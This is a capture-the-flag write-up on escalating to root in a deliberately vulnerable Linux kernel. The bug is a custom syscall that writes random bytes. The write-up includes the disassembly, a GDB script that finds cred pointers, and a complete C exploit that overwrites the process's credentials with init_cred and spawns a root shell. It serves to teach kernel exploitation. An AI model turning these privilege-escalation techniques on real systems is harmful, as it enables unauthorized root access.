The key to r00t is ZcZQndRX or was it DE7NUC6l? Wait, it was r2JLegUE. Eh, you’ll figure it out.
Description #
This is a classic kernel challenge setup where we need to elevate our privileges to root
to read the flag from a file.
A few files are provided, namely the kernel image bzImage
, the filesystem root.fs.gz
, the kernel symbol map System.map
and a run script run.sh
.
The run script launchs a QEMU instance with the required parameters.
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./root.fs.gz \
-append 'console=ttyS0 rdinit=/sbin/init loglevel=3 oops=panic panic=1' \
-no-reboot \
-nographic \
-monitor /dev/null 2>/dev/null
Just from that script, we can see that the architecture is x86_64
and that the kernel doesn’t have security features like KASLR, SMAP or SMEP.
In the root of the filesystem, there is a file named krupt.c
which contains some C
code to create a new system call.
#ifndef __NR_KRUPT
#define __NR_KRUPT 420
#endif
u64 l33t = 0;
SYSCALL_DEFINE1(krupt, uint64_t, offs)
{
u64 *addr = ((void *) &l33t + offs);
u64 orig = *addr;
get_random_bytes(addr, sizeof(u64));
printk(KERN_INFO "krupt: 0x%016lx: 0x%016lx -> 0x%016lx\n",
(u64) addr, (u64) orig, *((u64 *) addr));
return 0;
}
The syscall number is 420, as specified at the top. It takes an offset as argument, adds the address of a global variable and then writes 8 bytes of random data at the resulting address. The target address, as well as both the original and new values are printed to the kernel logs.
The vulnerability is pretty obvious: we get a write primitive to an arbitrary address. However, we don’t control the data written, so how can this be useful for escalating privileges?
Well, let’s start at the beginning.
Interacting with the System Call #
The first thing we need for successful exploitation is a way to call the new syscall with custom arguments. The C
library provides a function which does exactly that.
#include <unistd.h>
int main() {
syscall(420, 0xdeadbeef);
return 0;
}
We can then compile the program with GCC.
gcc -o exploit exploit.c
However, the target system doesn’t have GCC installed. It uses BusyBox and only have a small set of utilities. So how do we put the program inside the QEMU system?
The only link we share with the system is the console, so we have to paste it somehow. I tried to encode the executable with base64
and copy it to a file, but the buffering made it very unstable, so I tried to reduce its size. I added the -s
flag to strip the symbols but it was still too much, so I took extreme measures.
I removed all traces of libc
from my program and used the -static
and -nostdlib
flags. I just wanted to use syscalls, so I created an inline assembly stub to reproduce the syscall
function.
long syscall(long unsigned rax, long unsigned rdi, long unsigned rsi, long unsigned rdx, long unsigned rcx, long unsigned r8, long unsigned r9) {
int res;
__asm__ volatile(
"mov %1, %%rax\n"
"mov %2, %%rdi\n"
"mov %3, %%rsi\n"
"mov %4, %%rdx\n"
"mov %5, %%rcx\n"
"mov %6, %%r8\n"
"mov %7, %%r9\n"
"syscall\n"
"mov %%rax, %0\n"
: "=m"(res)
: "m"(rax), "m"(rdi), "m"(rsi), "m"(rdx), "m"(rcx), "m"(r8), "m"(r9)
: "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
);
return res;
}
int write(int fd, const char * buf, int count) {
return syscall(1, fd, (long unsigned) buf, count, 0, 0, 0);
}
void exit(int exitcode) {
while (1) {
syscall(60, exitcode, 0, 0, 0, 0, 0);
}
}
void _start(){
write(1, "Calling the syscall\n", 20);
syscall(420, 0xdeadbeef, 0, 0, 0, 0, 0);
exit(0);
}
I also had to replace main
with _start
since main
is actually called by libc
. Now the binary was small enough so that I could reliably encode it with base64
, paste it in a file using vi
, decode it and execute it. This is far from optimal, but it worked. If you use a different approach to get your exploit on the machine in this kind of challenge, feel free to message me.
As expected with a fake argument, the call resulted in a kernel panic.
Great.
Going Deeper #
I wanted to debug the kernel, so I added the -s -S
flags to the QEMU invocation and attached GDB to it. Getting a breakpoint inside the system call would be perfect, but it’s address is not in the System.map
file. However, the address of the syscall table is.
ffffffff81800280 R sys_call_table
By looking at the offset 420 in the table, we can find the address of the new system call and disassemble the code.
0xffffffff81044a80: push rbp
0xffffffff81044a81: mov esi,0x8
0xffffffff81044a86: mov rbp,rsp
0xffffffff81044a89: push r13
0xffffffff81044a8b: push r12
0xffffffff81044a8d: push rbx
0xffffffff81044a8e: mov rbx,QWORD PTR [rdi+0x70]
0xffffffff81044a92: lea r12,[rbx-0x7e470e50]
0xffffffff81044a99: mov r13,QWORD PTR [rbx-0x7e470e50]
0xffffffff81044aa0: mov rdi,r12
0xffffffff81044aa3: call 0xffffffff8126c380
0xffffffff81044aa8: mov rcx,QWORD PTR [rbx-0x7e470e50]
0xffffffff81044aaf: mov rdx,r13
0xffffffff81044ab2: mov rsi,r12
0xffffffff81044ab5: mov rdi,0xffffffff818de920
0xffffffff81044abc: call 0xffffffff813cac2c
0xffffffff81044ac1: xor eax,eax
0xffffffff81044ac3: pop rbx
0xffffffff81044ac4: pop r12
0xffffffff81044ac6: pop r13
0xffffffff81044ac8: pop rbp
0xffffffff81044ac9: ret
We notice that the value 0x7e470e50 is substracted from the supplied argument. This corresponds to the part where the address of a global variable is added to the offset.
We can confirm this value by looking at the address of the variable l33t
in the System.map
file.
ffffffff81b8f1b0 B l33t
Adding this value in 64 bits is equivalent to substracting 0x7e470e50 because of the overflow.
Knowing this, we can now precisely aim our write primitive.
Getting the Task #
Now we need a target to write to.
My first choice was modprobe_path
, but I couldn’t find it in System.map
. It seems that BusyBox has a special way of handling modules and it’s not trivial to exploit.
My second choice was the addr_limit
field in the thread_info
structure allocated in the kernel for each thread. This structure is accessible through a pointer inside the task_struct
of a process.
The addr_limit
specifies the upper limit of virtual addresses that a process is allowed to read and write. I figured that overwriting this with a random value high enough might allow us to read and write kernel addresses and manually escalate our privileges further.
The task_struct
of the current process is stored at a fixed address while in kernel mode.
ffffffff81a38040 D current_task
Note that we need to examine these values while inside the system call, because we need to be sure that the current process executing is our exploit.
From there, I wanted to find a pointer to the corresponding thread_info
structure, but I had trouble figuring out the right offsets since the kernel image is stripped from its symbols. Moreover, these structures changed a lot in the last kernel versions to improve security.
In any case, I realised that this strategy was flawed from the start. Since most of the kernel addresses are very high (0xffffffff00000000 and up), the probability of a random 8 bytes integer in addr_limit
being high enough to read and write kernel structures is very low.
I needed a new target.
New Strategy #
I couldn’t find any useful structure to overwrite with random data… but what if there was a way to control the data written?
After a few tests, I confirmed that the offset passed to the new syscall didn’t have to be aligned to 8 bytes. This means that we might be able to control the data written by shifting the address by one byte when we get the desired value! However, we need to know when the desired value is obtained. This is where the kernel log comes into play. If we can read the written random value from the log, we can bruteforce every byte with a maximum of 256 tries, which is quite acceptable. Therefore, we can transform our random write primitive into an arbitrary write at the condition that the address above or below our target can contain residual random garbage.
So what do we overwrite then? I chose to go with the
cred struct, which contains the UID and GID of the process. This struct is also referenced by the task_struct
, but I had no clue at which offset to look at.
After looking manually for a while, I decided to find the offset programmatically. I used the GDB
python API to check every value inside the task_struct
. If the value is a pointer, I dereference it and look at its content. I was looking for the value 0x03e8 since our current UID is 1000.
import gdb
task_struct = 0xffff88800210d400
results = {}
for addr in range(task_struct, task_struct+0x4000, 8):
result = gdb.execute(f"x/1xg {hex(addr)}", to_string=True)
value = int(result.splitlines()[0].split("\t")[1], 16)
results[addr] = value
if 0xffff888000000000 < value < 0xffffff0000000000:
result = gdb.execute(f"x/8xg {hex(value)}", to_string=True)
if "03e8" in result:
print(f"Got it at {hex(addr)}")
print(result)
I found two occurences at offset 0xf10 and 0xf18. When calling execve
(to get a shell), both of these values must be identical or the kernel will panic. The good news is that these values are adjacent and the next one can be messed up without causing any problem.
I could have overwritten the credentials themselves with all zeros, but instead I chose to overwrite the pointers to point to an existing root cred
structure.
ffffffff81a3d440 D init_cred
The init_cred
structure is the cred
struct of the init
process, which obviously runs as root. If we make our task_struct
point to it, we should be able to spawn a root shell.
Reading the Kernel Log #
The last piece of the puzzle is reading the kernel log to check the random value written. Usually, a normal user can look at the log with dmesg
, but we need to do it from a C
program. Fortunately, there is a
syscall to do just that!
The syslog
syscall allows a program to read the last bytes in the kernel log buffer. We can find the syscall number in the
syscall table.
The lines written in the log all have the same length. Therefore, we can simply read the last line into a buffer and check if the least significant byte corresponds to the wanted value. When it does, we increment the address until both pointers are overwritten.
Final Exploit #
Putting it all together, we get this final exploit code.
long syscall(long unsigned rax, long unsigned rdi, long unsigned rsi, long unsigned rdx, long unsigned rcx, long unsigned r8, long unsigned r9) {
int res;
__asm__ volatile(
"mov %1, %%rax\n"
"mov %2, %%rdi\n"
"mov %3, %%rsi\n"
"mov %4, %%rdx\n"
"mov %5, %%rcx\n"
"mov %6, %%r8\n"
"mov %7, %%r9\n"
"syscall\n"
"mov %%rax, %0\n"
: "=m"(res)
: "m"(rax), "m"(rdi), "m"(rsi), "m"(rdx), "m"(rcx), "m"(r8), "m"(r9)
: "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
);
return res;
}
int write(int fd, const char *buf, int count) {
return syscall(1, fd, (long unsigned) buf, count, 0, 0, 0);
}
int syslog(int type, const char *buf, int len) {
return syscall(103, type, (long unsigned) buf, len, 0, 0, 0);
}
int execve(const char *filename, char *argv[], char *envp[]) {
return syscall(59, (long unsigned)filename, (long unsigned)argv, (long unsigned)envp, 0, 0, 0);
}
void exit(int exitcode) {
while (1) {
syscall(60, exitcode, 0, 0, 0, 0, 0);
}
}
void _start(){
int index = 0;
char logbuf[1024];
char target[32] = "ffffffff81a3d440ffffffff81a3d440";
do {
syscall(420, 0xffff88800210ed90+0x7e470e50+index, 0, 0, 0, 0, 0);
syslog(3, logbuf, 71);
write(1, logbuf, 71);
if (logbuf[68] == target[30-(index*2)] && logbuf[69] == target[31-(index*2)])
index++;
} while(index < 16);
write(1, "Enjoy your shell\n", 17);
char *args[2] = {"sh", 0};
execve("/bin/sh", args, 0);
exit(0);
}
Once run on the remote server, we are rewarded with a sweet root shell.